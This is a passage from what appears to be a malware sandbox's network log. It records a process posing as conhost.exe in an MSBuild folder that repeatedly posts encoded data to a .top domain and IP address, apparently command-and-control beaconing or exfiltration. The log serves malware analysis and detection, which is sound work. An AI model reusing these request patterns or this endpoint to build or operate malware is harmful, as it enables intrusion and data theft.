    Expect: 100-continue
Oct 1, 2024 05:57:32.715603113 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:32.748742104 CEST | 1840 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:33.282223940 CEST | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:33 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw / Data Ascii: [opaque encoded body omitted]
Oct 1, 2024 05:57:33.342406034 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:33.521408081 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:33.521747112 CEST | 1120 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:33.787744045 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:33 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49707 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:32.349009991 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:32.748456955 CEST | 1120 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:32.954940081 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:33.085501909 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:32 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49708 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:33.947521925 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:34.294306993 CEST | 1120 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:34.554532051 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:34.681365013 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:34 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49709 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:34.968970060 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:35.326045036 CEST | 1120 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:35.599522114 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:35.725059986 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:35 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49712 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:35.978929043 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:36.325001001 CEST | 1120 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:36.593805075 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:36.727087021 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:36 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49714 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:38.302146912 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:38.652755976 CEST | 1840 | OUT | Data Raw: 58 5d 5a 5e 59 49 54 5f 5c 58 57 5a 54 52 55 5d 59 55 59 58 50 5d 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: X]Z^YIT_\XWZTRU]YUYXP]VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.3T (;)=3>=%((8('+1191]>" +!F/'P,
Oct 1, 2024 05:57:38.905919075 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:39.032681942 CEST | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: 0e 1d 25 59 27 0a 21 0d 21 12 29 59 3d 3c 20 04 30 0e 20 05 39 04 3c 06 27 3c 3f 5e 2e 1c 2a 11 3c 07 26 1f 26 07 2c 04 32 0b 2e 10 27 26 20 5f 0d 10 22 59 35 38 2d 09 2c 29 0d 5e 2a 21 0d 1a 25 33 3f 11 33 33 04 1b 2b 07 34 1c 27 12 3e 0b 30 12 35 0c 2c 43 24 58 2a 37 24 52 20 3b 2d 56 02 1e 21 09 32 38 3a 09 23 01 13 59 25 38 3b 04 21 06 26 0e 3d 3e 0d 03 24 0a 26 14 3e 3d 27 1e 3f 3f 28 03 35 03 39 14 23 57 21 57 27 33 27 5c 20 0d 2d 51 05 34 5a 50
    Data Ascii: %Y'!!)Y=< 0 9<'<?^.*<&&,2.'& _"Y58-,)^*!%3?33+4'>05,C$X*7$R ;-V!28:#Y%8;!&=>$&>='??(59#W!W'3'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49715 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:42.002616882 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:42.356487036 CEST | 1120 | OUT | Data Raw: 58 54 5f 59 59 49 51 53 5c 58 57 5a 54 59 55 5c 59 5b 59 5c 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XT_YYIQS\XWZTYU\Y[Y\P]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9#+R">2$%%',U'$.<Q1"=1\??*)!F/'P,!
Oct 1, 2024 05:57:42.626559019 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:42.761073112 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:42 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49716 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:43.070566893 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:43.419334888 CEST | 1120 | OUT | Data Raw: 5d 55 5a 59 59 48 54 5f 5c 58 57 5a 54 5e 55 5f 59 57 59 59 50 51 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: ]UZYYHT_\XWZT^U_YWYYPQVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!- 5(;)2'=6&+;,3#W%.S$12$4>\?"$S<!F/'P,=
Oct 1, 2024 05:57:43.672549963 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:43.805306911 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:43 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49717 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:44.049694061 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:44.402856112 CEST | 1840 | OUT | Data Raw: 58 56 5f 5e 5c 46 54 51 5c 58 57 5a 54 5d 55 58 59 51 59 5f 50 5b 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XV_^\FTQ\XWZT]UXYQY_P[VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:0#R!+([=!&'*&/0?S3=+$!*&4?1#?)!F/'P,1
Oct 1, 2024 05:57:44.683520079 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:44.818905115 CEST | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: 0e 1d 26 00 30 24 03 0d 21 2f 3d 58 2a 11 27 58 30 27 09 19 2d 3e 28 08 26 3f 34 02 2e 54 31 05 2b 3a 36 12 25 2d 28 04 25 31 2d 0e 27 26 20 5f 0d 10 22 13 21 28 2e 1c 3b 17 24 01 3d 57 2c 07 32 09 3f 11 30 33 32 1b 3f 2e 3c 1f 30 5a 29 1e 27 5a 36 57 2f 0b 2f 00 3d 09 28 1f 34 01 2d 56 02 1e 22 56 25 28 21 51 20 11 32 01 25 28 20 5e 21 16 31 1d 3d 00 23 03 30 24 3a 5c 3e 2d 0a 04 3f 3c 2c 02 23 2a 04 06 34 31 0f 57 27 33 27 5c 20 0d 2d 51 05 34 5a 50
    Data Ascii: &0$!/=X*'X0'->(&?4.T1+:6%-(%1-'& _"!(.;$=W,2?032?.<0Z)'Z6W//=(4-V"V%(!Q 2%( ^!1=#0$:\>-?<,#*41W'3'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49718 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:44.132702112 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:44.480855942 CEST | 1120 | OUT | Data Raw: 5d 52 5f 54 5c 44 54 51 5c 58 57 5a 54 52 55 5e 59 57 59 59 50 58 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: ]R_T\DTQ\XWZTRU^YWYYPXVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:07T";>*3-&;?X,83>(R$"-14&?;<!F/'P,
Oct 1, 2024 05:57:44.757843018 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:44.928672075 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49719 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:45.569349051 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
Oct 1, 2024 05:57:45.918323040 CEST | 1120 | OUT | Data Raw: 58 57 5a 5f 5c 44 54 50 5c 58 57 5a 54 53 55 58 59 56 59 56 50 51 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XWZ_\DTP\XWZTSUXYVYVPQVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".#4 ++)25]&.%&88#?V'>,V2W&4?$U?)!F/'P,
Oct 1, 2024 05:57:46.194348097 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:46.329195023 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49721 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:46.603688955 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:46.949543953 CEST | 1120 | OUT | Data Raw: 58 50 5a 58 59 47 54 55 5c 58 57 5a 54 58 55 58 59 5b 59 5f 50 5b 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XPZXYGTU\XWZTXUXY[Y_P[VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#T6 ?2!05&+\;34Q&1>&<$V(!F/'P,%
Oct 1, 2024 05:57:47.237483025 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:47.409883976 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:47 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49723 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:48.106285095 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1120
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:48.465204000 CEST | 1120 | OUT | Data Raw: 58 53 5f 5e 59 49 51 53 5c 58 57 5a 54 52 55 59 59 54 59 59 50 58 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XS_^YIQS\XWZTRUYYTYYPXVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]:0(!;+>"3=>%;,?W' V21>T&'&^<$R*9!F/'P,
Oct 1, 2024 05:57:48.726643085 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:48.858896017 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:48 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49724 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:48.982975006 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:49.340172052 CEST | 1112 | OUT | Data Raw: 58 51 5a 5e 59 45 51 56 5c 58 57 5a 54 5b 55 5d 59 56 59 5c 50 5e 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: XQZ^YEQV\XWZT[U]YVY\P^VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"90?W!+>.$>&^&8+Y-3$,S2!&%>"8V+!F/'P,9
Oct 1, 2024 05:57:49.588702917 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:49.717082977 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:49 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3c 55 5c 50
    Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49725 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:49.830857992 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
    Expect: 100-continue
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49726 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:49.866766930 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1112
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:50.218527079 CEST | 1112 | OUT | Data Raw: 5d 52 5a 5c 59 47 51 54 5c 58 57 5a 54 5b 55 5d 59 53 59 5f 50 5c 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
    Data Ascii: ]RZ\YGQT\XWZT[U]YSY_P\VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-3S6;4]*"Z&>>%(48343X8V&.W1><"<!F/'P,9
Oct 1, 2024 05:57:50.472203016 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:50.601152897 CEST | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:50 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
